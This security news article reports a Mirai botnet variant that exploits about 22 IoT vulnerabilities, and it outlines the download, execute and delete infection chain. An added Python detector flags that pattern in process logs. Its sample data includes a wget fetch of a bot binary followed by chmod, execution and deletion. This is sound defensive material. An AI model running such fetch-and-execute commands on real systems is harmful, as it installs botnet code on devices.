Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign

Since March 2023, threat actors have been found exploiting several IoT vulnerabilities to distribute a variant of the Mirai botnet. According to Palo Alto Networks Unit 42 researchers, these vulnerabilities are being leveraged to gain complete control over devices, which are then used to carry out additional attacks, such as DDoS attacks.

More details

The latest Mirai botnet variant has been identified in two ongoing campaigns that started on March 14 and spiked in April and June.
  • The variant targets around 22 known security issues in various connected products such as routers, DVRs, NVRs, WiFi communication dongles, thermal monitoring systems, access control systems, and solar power generation monitors. 
  • Some of these affected products are from D-Link, Nagios, Arris, Zyxel, TP-Link, SolarView, Nortek, Tenda, and MediaTek.

Infection chain

  • The attack chain commences by exploiting one of these flaws, laying the groundwork for executing a shell script from an external resource. 
  • This script downloads the botnet client that matches the architecture of the compromised device, such as armv4l, arm5l, arm6l, arm7l, mips, mipsel, sh4, x86_64, i686, i586, arc, m68k, and sparc.
  • After the bot client has been executed, the shell script downloader deletes the client file to cover its tracks and reduce the likelihood of detection.
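
The download, execute, delete sequence described above can be hunted for in process-execution logs. The following is an added example, not code from the article or from Unit 42: the event format, session ids, paths and hosts are constructed for illustration, and it covers only the case where the fetched file is run directly by its path.

```python
import re
import shlex

# Architecture names listed in the article; a fetch command naming one is an extra signal.
ARCHES = {"armv4l", "arm5l", "arm6l", "arm7l", "mips", "mipsel", "sh4",
          "x86_64", "i686", "i586", "arc", "m68k", "sparc"}
FETCHERS = {"wget", "curl"}

# Constructed exec-audit records: (seconds, session id, command line).
SAMPLE_EVENTS = [
    (100, "s1", "wget http://192.0.2.10/client.mips -O /tmp/c"),
    (101, "s1", "chmod 777 /tmp/c"),
    (102, "s1", "/tmp/c"),
    (103, "s1", "rm -f /tmp/c"),
    (200, "s2", "curl -o /tmp/fw.bin https://updates.example/fw.bin"),
    (205, "s2", "sha256sum /tmp/fw.bin"),
    (900, "s2", "rm /tmp/fw.bin"),
]

def output_path(argv):
    """Return the path a fetch command writes to, or None if not given."""
    for flag in ("-O", "-o"):
        if flag in argv[:-1]:
            return argv[argv.index(flag) + 1]
    return None

def detect(events, window=60):
    """Flag sessions where one path is fetched, run, then deleted within `window` seconds."""
    state, alerts = {}, []  # state: (session, path) -> stage timestamps
    for ts, sess, cmd in sorted(events):
        argv = shlex.split(cmd)
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in FETCHERS and (path := output_path(argv)):
            arch = any(re.search(rf"[./_-]{re.escape(a)}\b", cmd) for a in ARCHES)
            state[(sess, path)] = {"fetch": ts, "arch_named": arch}
        elif (sess, argv[0]) in state:  # the fetched file itself is executed
            state[(sess, argv[0])].setdefault("exec", ts)
        elif prog == "rm":
            for path in argv[1:]:
                st = state.pop((sess, path), None)
                if st and "exec" in st and ts - st["fetch"] <= window:
                    alerts.append({"session": sess, "path": path, **st, "delete": ts})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Session s2 in the sample fetches and later removes a file without ever executing it, so it is not flagged.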

Mirai-inspired botnets continue to grow in the wild

  • Recently, the Shadowserver Foundation cited active exploitation of a command injection flaw in Zyxel gear by a Mirai-like botnet.
  • Another variant, dubbed IZ1H9, was found in large-scale network attacks targeting servers and networking devices running Linux. 
  • In February, a Mirai variant, tracked as V3G4, exploited 13 different vulnerabilities in three different campaigns to launch massive DDoS attacks.

Ending lines

The abuse of IoT devices persists as researchers continue to uncover botnet variants, especially those derived from Mirai. Given the rising popularity of this botnet and its variants among threat actors, organizations are advised to secure their devices by applying the latest security patches as soon as possible.
Cyware Publisher
